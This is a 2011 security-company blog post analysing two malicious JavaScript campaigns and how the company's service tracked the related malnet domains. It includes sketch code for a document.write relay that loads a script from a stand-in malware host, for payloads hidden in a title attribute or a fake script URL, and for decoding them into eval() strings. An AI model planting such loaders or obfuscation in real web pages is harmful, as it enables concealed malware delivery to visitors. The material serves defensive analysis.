New JavaScript Tricks from the Bad Guys / An Archaeologist at Work

December 12, 2011 - By Chris Larsen

[This article is a combination of two posts from our internal security blog: one from last month when I was on the road, and one from this month that looks back at a different attack from the same time period. The common thread is the never-ending creativity of the Bad Guys in coming up with new ways to abuse JavaScript in cloaking their attacks...]

ATTACK #1 (New JavaScript Trick):

Normally, security-aware computer geeks teach their friends and family to delete spammy- or malicious-looking e-mails without opening them (or at least not to click on the links or attachments). Malware researchers, however, ask to have those e-mails forwarded to their honeypot accounts for analysis...

So today [Nov 10] I got an interesting present to unwrap:

screenshot of malicious spam

The "Word Document" was actually just a simple HTTP link to a hacked site ( that was hosting malicious HTML pages in several newly created subdirectories -- we'd already collected four samples in our malware database:


Clicking on the link in the e-mail retrieves the following small HTML page:

screenshot of malware page code


(One of the three hacked sites has already detected and removed the injected js.js file, so it gets to remain anonymous. You other two need to get cleaned up!)

The js.js file does not get us to the good bit just yet. Instead, it serves a simple relay link to the actual malware page, via the following single line of code:


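The actual one-liner (and its domain) isn't reproduced here, but injected relays of this kind typically amount to a single document.write() that pulls in the next stage. A purely illustrative sketch (domain invented, not the real one):

```javascript
// Illustrative reconstruction only -- not the actual relay line.
// The injected one-liner builds a <script> tag pointing at the next stage:
const tag = '<script src="http://malware-relay.example/main.php"></scr' + 'ipt>';
// In the browser, the relay simply does: document.write(tag);
// (the closing tag is split in two so the relay script doesn't terminate itself)
console.log(tag);
```

Splitting the literal `</script>` across a string concatenation is a common touch: it keeps an HTML parser from ending the relay script prematurely.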
The domain was auto-detected by WebPulse's famous Background Checker module and flagged as a malware domain -- about 19 hours before I wrote this [i.e., the original] blog post.

Its payload is quite interesting (as obfuscated script usually is), and worth a look...

screenshot of obfuscated script


The key points are highlighted: create an element with a particular "id=" value and an interesting "title=" string (more on that in a moment); then a small function looks up that element by its "id", reads its "title", and splits the title into numeric chunks wherever there's an 'n' character. Finally, it assembles a payload string from those chunks and executes it with an eval() call. (That "title=" string is a whopping 88,920 characters long, by the way -- wowza! -- with every 3rd character the aforementioned 'n'.)
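Mechanically, the decoding step is simple. A stand-alone toy sketch of the same trick (a short invented title string standing in for the 88,920-character original, and the element lookup reduced to a comment):

```javascript
// Toy reconstruction of the title-attribute trick; all names are illustrative.
// In the real page, the string below would come from something like:
//   document.getElementById("someId").title
const title = "97n108n101n114n116n40n49n41"; // character codes separated by 'n'
const payload = title
  .split("n")                                   // ["97","108","101",...]
  .map(c => String.fromCharCode(parseInt(c, 10)))
  .join("");                                    // reassembled source string
// payload is now "alert(1)" -- the malware would hand it to eval(payload)
console.log(payload);
```

Since the payload only ever exists as a string of digits in an innocuous-looking attribute, nothing executable appears in the page source until the eval() fires.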

Writing this from the road, I don't have the time/tools to work completely through the script, but it produces a large blob of densely packed (and moderately obscured) JavaScript that is clearly malicious -- set to check the installed versions of the OS, the browser, and various plugins...
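For flavor, the sort of version-checking such payloads perform can be sketched as follows (hypothetical code, not the payload itself; the user-agent string is hardcoded here, where a browser payload would read navigator.userAgent):

```javascript
// Hypothetical fingerprinting sketch -- not the actual payload's code.
const ua = "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1)"; // navigator.userAgent in a browser
const isWindows = /Windows NT [\d.]+/.test(ua);
const ieMatch = ua.match(/MSIE (\d+)/);
const ieVersion = ieMatch ? parseInt(ieMatch[1], 10) : null;
// Real kits also walk navigator.plugins to find Flash, Java, and Adobe
// Reader versions, then choose an exploit that matches what's installed.
console.log(isWindows, ieVersion);
```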


Since I didn't recall ever seeing the trick of using an element's "title" attribute to host an obfuscated payload before (disclaimer: I don't spend a lot of time reverse-engineering malicious JavaScript on a daily basis), I was curious to see how well this page was detected. So I submitted a copy of the malicious Web page (saved as a straightforward HTML file) to VirusTotal, and none of the 43 engines detected it as malicious. Not so good.

I also submitted the actual URL to the bank of 16 URL detectors in VT, and this time had a little better luck: 2 of the 16 classified it as malicious. However, a bit of experimentation showed that they were not analyzing the JavaScript, but were simply keying on the malicious domain name (i.e., it was in their databases, as it was in ours).


ATTACK #2 (An Archaeologist at Work):

One of our VLCs (Very Large Customers) asked me a couple of weeks ago to comment on a particular attack. They were nice enough to include a link to a security blog (dated 11/02) that included a breakdown of the attack. The blog post is well worth a read, since the Bad Guys came up with yet another cool way to abuse JavaScript (hiding the obfuscated payload string in a parameter to a non-existent URL)...
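That trick is worth a quick sketch. The idea, reconstructed here with invented names and addresses rather than the actual attack code: an injected script tag points at a URL that 404s harmlessly, but smuggles the real payload in its query string, where an inline decoder can read it back out and eval it.

```javascript
// Illustrative only. The injected tag might look like:
//   <script src="http://203.0.113.7/missing.js?id=616c6572742832293b"></script>
// The request itself 404s; the payload rides along in the "id" parameter.
const fakeSrc = "http://203.0.113.7/missing.js?id=616c6572742832293b";
const hex = fakeSrc.split("id=")[1]; // in the page: read back from the tag's .src
let payload = "";
for (let i = 0; i < hex.length; i += 2) {
  payload += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16)); // hex -> chars
}
// payload is now "alert(2);" -- handed to eval() by the inline decoder
console.log(payload);
```

From a detector's point of view this is nasty: the "payload" is just an opaque query string on a request that returns nothing, so there's no malicious file to scan.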

Normally, we don't like to go on "archaeology expeditions" into logs that are over a month old, but this one seemed to be worth a try, since there were three specific items in the write-up that I could research:

(1) the relay site: (injected via the clever JavaScript technique)
(2) (named as a sort of second-stage relay)
(3) (named as the exploit host)


For (1), our logs show the attack beginning on 10/25 and running through 11/01 (possibly later, but the summary logs didn't show it after that, and I didn't have time to dig into the detailed logs). Some searching on Google suggests that 11/01-11/02 is the timeframe in which the security industry in general became aware of this domain and the attack. (Note that this site was not actually "attacking"; it was only doing "unarmed reconnaissance," as an analytics site might -- i.e., seeing what browser you were using and what plug-ins/add-ons it had -- before forwarding you on to the real exploit kits. In other words, the Bad Guys had taken some pains to cover their tracks; if this injection had simply been a link to a malware site, the site would have been picked up a lot sooner. This way, they kept a low profile for several days.)


For (2), the story is much more interesting, as this is the stage where I'd expect us to start catching things. The server at came into use on 10/31, serving a domain called (and only that domain). This domain was in use for about four hours. (Interestingly, for its first hour it appears not to have been functional, returning 404s.)

WebPulse recognized very early that was a domain it hadn't seen before, and about an hour and a half after the first URL showed up in the logs, it had completed its DNA match on the server hosting it, and linked that server to a known malnet that it had been tracking for over two weeks. From that point on, it returned ratings of "Malware" for all requests for The same server also hosted two other attack domains that day: and -- which we also flagged in real-time as Malware. (The server continued to be active as a malware host for a couple of weeks, hosting several more attack domains before it went dormant. WebPulse flagged all of these requests as Malware.)

Notably, the server at had several sibling servers (located at a variety of other IP addresses) in the weeks leading up to the attack. We had identified this malnet on 10/13 -- all domains on any of the servers should have been flagged as Malware by WebPulse from that point on. (Although in the edge case of a completely new domain on a completely new server -- like -- it may take WebPulse an hour or so to do a conclusive DNA analysis and identify the new server as a sibling to the ones it already knows about.)


For (3), it's a small piece of a very incomplete picture. My logs show that was active for precisely 24 hours (midnight to midnight) on 10/31. Further, it was only serving one specific PDF exploit -- one that was dynamically flagged as Suspicious by a different WebPulse module (the "Shady-PDF Detector"). That suggests this domain was only one part of the full attack, since the attack ran for more than one day, and it's very unlikely that all of the visitors to this attack network were deemed susceptible only to this particular vulnerability. However, piecing together the picture of sibling sites serving other exploits will necessarily be messy and incomplete this long after the attack. I did find at least three other domains that appeared to be sibling sites of (hosted on some of the same servers, and serving similar PDF exploits that were also flagged in real time as Suspicious by the Shady-PDF Detector):,, and


These two attacks highlight the challenge "malicious script detectors" face in handling new variants: the Bad Guys are endlessly inventive in coming up with new ways to obfuscate their code and hide its run-time behavior as it re-assembles the attack code and launches it. Building defenses to recognize specific attacks can be done, but it takes continuing time and effort, and the attacks are often over (or substantially modified) before a specific defense is ready. In our experience, a defense that focuses on identifying malicious sites, and tracking the malnets that spawn them, is superior.

We've put quite a bit of effort into identifying important attack elements like exploit kits, and the fact that we were able to identify a major component of this attack network on 10/13, twelve days before the " attack" began on 10/25, is pretty good evidence that it works. Being able to auto-identify the new server in this attack within 90 minutes of its birth, and begin auto-blocking its domains, is pretty cool.